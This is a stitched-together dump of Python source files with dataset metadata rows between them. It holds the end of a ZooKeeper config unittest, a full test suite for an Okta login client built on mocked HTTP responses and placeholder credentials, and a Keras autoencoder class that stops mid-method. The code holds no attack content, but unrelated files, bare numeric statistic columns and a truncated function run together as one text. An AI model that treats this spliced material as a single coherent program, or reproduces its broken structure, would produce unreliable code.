self.assertEqual('record_dir/', c.record_dir())
self.assertEqual('seq_dir/', c.seq_dir())
self.assertEqual('lock_dir/', c.lock_dir())
self.assertEqual('node_id', c.node_id())
self.assertEqual(('digest', 'a', 'b'), c.auth())
self.assertEqual((('foo', 'bar', 'cd'),
('xp', '123', 'cdrwa')),
c.acl())
self.assertEqual('lock_dir/', c.lock())
self.assertEqual('lock_dir/a', c.lock('a'))
self.assertEqual('record_dir/', c.record())
self.assertEqual('record_dir/a', c.record('a'))
self.assertEqual('tx_dir/alive/', c.tx_alive())
self.assertEqual('tx_dir/alive/a', c.tx_alive('a'))
self.assertEqual('tx_dir/alive/0000000001', c.tx_alive(1))
self.assertEqual('tx_dir/state/', c.tx_state())
self.assertEqual('tx_dir/state/a', c.tx_state('a'))
self.assertEqual('tx_dir/state/0000000001', c.tx_state(1))
self.assertEqual('tx_dir/journal/', c.journal())
self.assertEqual('tx_dir/journal/a', c.journal('a'))
self.assertEqual('tx_dir/journal/0000000001', c.journal(1))
self.assertEqual('tx_dir/txidset', c.txidset())
self.assertEqual('tx_dir/txid_maker', c.txid_maker())
self.assertEqual('seq_dir/', c.seq())
self.assertEqual('seq_dir/a', c.seq('a'))
self.assertEqual(zkutil.make_kazoo_digest_acl((('foo', 'bar', 'cd'), ('xp', '123', 'cdrwa'))),
c.kazoo_digest_acl())
self.assertEqual(('digest', 'a:b'), c.kazoo_auth())
def test_default(self):
old = (
config.zk_hosts,
config.zk_tx_dir,
config.zk_record_dir,
config.zk_lock_dir,
config.zk_node_id,
config.zk_auth,
config.zk_acl,
)
config.zk_hosts = 'HOSTS'
config.zk_tx_dir = 'TX_DIR/'
config.zk_record_dir = 'RECORD_DIR/'
config.zk_seq_dir = 'SEQ_DIR/'
config.zk_lock_dir = 'LOCK_DIR/'
config.zk_node_id = 'NODE_ID'
config.zk_auth = ('DIGEST', 'A', 'B')
config.zk_acl = (('FOO', 'BAR', 'CD'), ('XP', '123', 'CDRWA'))
c = zkutil.ZKConf()
self.assertEqual('HOSTS', c.hosts())
self.assertEqual('TX_DIR/', c.tx_dir())
self.assertEqual('RECORD_DIR/', c.record_dir())
self.assertEqual('SEQ_DIR/', c.seq_dir())
self.assertEqual('LOCK_DIR/', c.lock_dir())
self.assertEqual('NODE_ID', c.node_id())
self.assertEqual(('DIGEST', 'A', 'B'), c.auth())
self.assertEqual((('FOO', 'BAR', 'CD'),
('XP', '123', 'CDRWA')),
c.acl())
self.assertEqual('LOCK_DIR/', c.lock())
self.assertEqual('LOCK_DIR/a', c.lock('a'))
self.assertEqual('RECORD_DIR/', c.record())
self.assertEqual('RECORD_DIR/a', c.record('a'))
self.assertEqual('SEQ_DIR/', c.seq())
self.assertEqual('SEQ_DIR/a', c.seq('a'))
self.assertEqual('TX_DIR/alive/', c.tx_alive())
self.assertEqual('TX_DIR/alive/a', c.tx_alive('a'))
self.assertEqual('TX_DIR/alive/0000000001', c.tx_alive(1))
self.assertEqual('TX_DIR/state/', c.tx_state())
self.assertEqual('TX_DIR/state/a', c.tx_state('a'))
self.assertEqual('TX_DIR/state/0000000001', c.tx_state(1))
self.assertEqual('TX_DIR/journal/', c.journal())
self.assertEqual('TX_DIR/journal/a', c.journal('a'))
self.assertEqual('TX_DIR/journal/0000000001', c.journal(1))
self.assertEqual('TX_DIR/txidset', c.txidset())
self.assertEqual('TX_DIR/txid_maker', c.txid_maker())
self.assertEqual(zkutil.make_kazoo_digest_acl((('FOO', 'BAR', 'CD'), ('XP', '123', 'CDRWA'))),
c.kazoo_digest_acl())
self.assertEqual(('DIGEST', 'A:B'), c.kazoo_auth())
(
config.zk_hosts,
config.zk_tx_dir,
config.zk_record_dir,
config.zk_lock_dir,
config.zk_node_id,
config.zk_auth,
config.zk_acl,
) = old
| 42.185484
| 102
| 0.50736
| 611
| 5,231
| 4.124386
| 0.081833
| 0.321429
| 0.161905
| 0.190476
| 0.869048
| 0.847619
| 0.830556
| 0.822222
| 0.813492
| 0.813492
| 0
| 0.02383
| 0.326133
| 5,231
| 123
| 103
| 42.528455
| 0.691064
| 0
| 0
| 0.171429
| 0
| 0
| 0.162493
| 0.027146
| 0
| 0
| 0
| 0
| 0.514286
| 1
| 0.019048
| false
| 0
| 0.038095
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a78723847cfe82b0d4a9bd5516a27a19629adb9a
| 24,332
|
py
|
Python
|
tests/core/test_okta.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_okta.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_okta.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
from tests.test_base import TestBase
from tests.test_base import SESSION_RESPONSE
from tests.test_base import AUTH_TOKEN_RESPONSE
from tests.test_base import AUTH_MFA_PUSH_RESPONSE
from tests.test_base import AUTH_MFA_TOTP_RESPONSE
from tests.test_base import AUTH_MFA_MULTIPLE_RESPONSE
from tests.test_base import AUTH_MFA_YUBICO_HARDWARE_RESPONSE
from tests.test_base import MFA_WAITING_RESPONSE
from tests.test_base import APPLICATIONS_RESPONSE
from tests.test_base import SAML_RESPONSE
from mock import patch
from mock import call
from mock import MagicMock
from datetime import datetime
from collections import OrderedDict
from requests import ConnectionError
from requests import ConnectTimeout
from aws_okta_processor.core.okta import Okta
import responses
import json
class StubDate(datetime):
pass
class TestOkta(TestBase):
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.getpass')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_no_pass(
self,
mock_print_tty,
mock_makedirs,
mock_getpass,
mock_open,
mock_chmod
):
mock_getpass.getpass.return_value = "user_pass"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
organization="organization.okta.com"
)
mock_getpass.getpass.assert_called_once()
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.datetime', StubDate)
@patch('aws_okta_processor.core.okta.os.path.isfile')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_cached_session(
self,
mock_print_tty,
mock_makedirs,
mock_isfile,
mock_open,
mock_chmod
):
StubDate.now = classmethod(lambda cls, tz: datetime(1, 1, 1, 0, 0, tzinfo=tz))
mock_isfile.return_value = True
mock_enter = MagicMock()
mock_enter.read.return_value = SESSION_RESPONSE
mock_open().__enter__.return_value = mock_enter
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions/me/lifecycle/refresh',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_session_id, "session_token")
self.assertEqual(okta.organization, "organization.okta.com")
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_auth_value_error(
self,
mock_print_tty,
mock_makedirs
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
body="NOT JSON",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_auth_send_error(
self,
mock_print_tty,
mock_makedirs
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_push_challenge(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_PUSH_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(MFA_WAITING_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/lifecycle/activate/poll',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.input')
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_totp_challenge(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod,
mock_input
):
mock_input.return_value = "123456"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_TOTP_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.input')
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_hardware_token_challenge(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod,
mock_input
):
mock_input.return_value = "123456"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_YUBICO_HARDWARE_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.prompt.input')
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty', new=MagicMock())
@patch('aws_okta_processor.core.prompt.print_tty', new=MagicMock())
@responses.activate
def test_okta_mfa_push_multiple_factor_challenge(
self,
mock_makedirs,
mock_open,
mock_chmod,
mock_input
):
mock_input.return_value = "2"
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_MULTIPLE_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json=json.loads(MFA_WAITING_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/lifecycle/activate/poll',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
self.assertEqual(okta.okta_single_use_token, "single_use_token")
self.assertEqual(okta.organization, "organization.okta.com")
self.assertEqual(okta.okta_session_id, "session_token")
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_verify_value_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_PUSH_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
body="NOT JSON",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_mfa_verify_send_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_MFA_PUSH_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn/factors/id/verify',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_session_id_key_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_session_id_value_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
body="NOT JSON",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.datetime', StubDate)
@patch('aws_okta_processor.core.okta.os.path.isfile')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_refresh_key_error(
self,
mock_print_tty,
mock_makedirs,
mock_isfile,
mock_open,
mock_chmod
):
StubDate.now = classmethod(lambda cls, tz: datetime(1, 1, 1, 0, 0, tzinfo=tz))
mock_isfile.return_value = True
mock_enter = MagicMock()
mock_enter.read.return_value = SESSION_RESPONSE
mock_open().__enter__.return_value = mock_enter
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions/me/lifecycle/refresh',
json={
"status": "foo",
"errorSummary": "bar"
},
status=500
)
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Status: foo"),
call("Error: Summary: bar")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.datetime', StubDate)
@patch('aws_okta_processor.core.okta.os.path.isfile')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_refresh_value_error(
self,
mock_print_tty,
mock_makedirs,
mock_isfile,
mock_open,
mock_chmod
):
StubDate.now = classmethod(lambda cls, tz: datetime(1, 1, 1, 0, 0, tzinfo=tz))
mock_isfile.return_value = True
mock_enter = MagicMock()
mock_enter.read.return_value = SESSION_RESPONSE
mock_open().__enter__.return_value = mock_enter
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions/me/lifecycle/refresh',
body="bob",
status=500
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Status Code: 500"),
call("Error: Invalid JSON")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_get_applications(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
responses.add(
responses.GET,
'https://organization.okta.com/api/v1/users/me/appLinks',
json=json.loads(APPLICATIONS_RESPONSE)
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
applications = okta.get_applications()
expected_applications = OrderedDict(
[
('AWS', 'https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/270'),
('AWS GOV', 'https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/272')
]
)
self.assertEqual(applications, expected_applications)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_get_saml_response(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
json=json.loads(AUTH_TOKEN_RESPONSE)
)
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/sessions',
json=json.loads(SESSION_RESPONSE)
)
responses.add(
responses.GET,
'https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/270',
body=SAML_RESPONSE
)
okta = Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
saml_response = okta.get_saml_response(
application_url='https://organization.okta.com/home/amazon_aws/0oa3omz2i9XRNSRIHBZO/270'
)
self.assertEqual(saml_response, SAML_RESPONSE)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_connection_timeout(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
body=ConnectTimeout()
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Timed Out")
]
mock_print_tty.assert_has_calls(print_tty_calls)
@patch('aws_okta_processor.core.okta.os.chmod')
@patch('aws_okta_processor.core.okta.open')
@patch('aws_okta_processor.core.okta.os.makedirs')
@patch('aws_okta_processor.core.okta.print_tty')
@responses.activate
def test_okta_connection_error(
self,
mock_print_tty,
mock_makedirs,
mock_open,
mock_chmod
):
responses.add(
responses.POST,
'https://organization.okta.com/api/v1/authn',
body=ConnectionError()
)
with self.assertRaises(SystemExit):
Okta(
user_name="user_name",
user_pass="user_pass",
organization="organization.okta.com"
)
print_tty_calls = [
call("Error: Connection Error")
]
mock_print_tty.assert_has_calls(print_tty_calls)
| 30.878173
| 101
| 0.593211
| 2,671
| 24,332
| 5.137402
| 0.049794
| 0.042851
| 0.097945
| 0.122431
| 0.934339
| 0.925667
| 0.915829
| 0.905699
| 0.885877
| 0.870864
| 0
| 0.008326
| 0.299071
| 24,332
| 787
| 102
| 30.917408
| 0.796247
| 0
| 0
| 0.785924
| 0
| 0.002933
| 0.284728
| 0.149515
| 0
| 0
| 0
| 0
| 0.061584
| 1
| 0.027859
| false
| 0.035191
| 0.029326
| 0
| 0.060117
| 0.085044
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac647a71bb737d82d3c82d5896aac4e114739f93
| 12,508
|
py
|
Python
|
Build_AutoEncoder.py
|
nephilim2016/AutoEncoder-for-GPR-Denoise
|
b55be16bd0b6af785efcf072d68dd5523a72f964
|
[
"MIT"
] | null | null | null |
Build_AutoEncoder.py
|
nephilim2016/AutoEncoder-for-GPR-Denoise
|
b55be16bd0b6af785efcf072d68dd5523a72f964
|
[
"MIT"
] | null | null | null |
Build_AutoEncoder.py
|
nephilim2016/AutoEncoder-for-GPR-Denoise
|
b55be16bd0b6af785efcf072d68dd5523a72f964
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 8 16:58:10 2020
@author: nephilim
"""
import keras
# def mse(y_true,y_pred):
# return keras.backend.mean(keras.backend.square(y_pred-y_true),axis=-1)
class AutoEncoder():
def __init__(self,ImageShape,filters,kernel_size,latent_dim):
self.ImageShape=ImageShape
self.filters=filters
self.kernel_size=kernel_size
self.latent_dim=latent_dim
def Encoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Ouput_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def Decoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def DropOutEncoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
x=keras.layers.Dropout(0.2)(x)
# if idx==1:
# residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=3,padding='same')(self.Encoder_Input)
# residual=keras.layers.MaxPool2D((4,4))(residual)
# x=keras.layers.add([x,residual])
# residual=keras.layers.Conv2D(filters=self.filters[-1],kernel_size=3,strides=2**len(self.filters),padding='same')(self.Encoder_Input)
# x=keras.layers.add([x,residual])
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Ouput_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def DropOutDecoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
x=keras.layers.Dropout(0.2)(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def ResidualConnectionEncoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
x=keras.layers.Dropout(0.2)(x)
if idx==0:
residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=5,padding='same')(self.Encoder_Input)
residual=keras.layers.BatchNormalization()(residual)
residual=keras.layers.MaxPool2D((2,2))(residual)
x=keras.layers.add([x,residual])
if idx==1:
residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=5,padding='same')(self.Encoder_Input)
residual=keras.layers.BatchNormalization()(residual)
residual=keras.layers.MaxPool2D((4,4))(residual)
x=keras.layers.add([x,residual])
# residual=keras.layers.Conv2D(filters=self.filters[-1],kernel_size=3,strides=2**len(self.filters),padding='same')(self.Encoder_Input)
# x=keras.layers.add([x,residual])
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Ouput_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def ResidualConnectionDecoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
